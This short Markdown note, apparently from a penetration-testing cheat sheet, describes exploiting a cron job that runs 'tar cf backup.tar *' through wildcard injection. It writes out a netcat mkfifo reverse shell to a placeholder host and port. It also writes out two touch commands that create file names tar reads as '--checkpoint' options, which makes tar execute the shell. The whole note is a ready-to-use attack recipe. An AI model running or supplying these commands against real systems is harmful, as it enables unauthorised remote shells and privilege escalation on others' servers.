14 lines
565 B
Markdown
14 lines
565 B
Markdown
|
# Wildcard usage
|
||
|
* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
|
||
|
|
||
|
## Another Example
|
||
|
|
||
|
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
|
||
|
|
||
|
```sh
|
||
|
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
|
||
|
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
|
||
|
touch "/var/www/html/--checkpoint=1"
|
||
|
```
|
||
|
|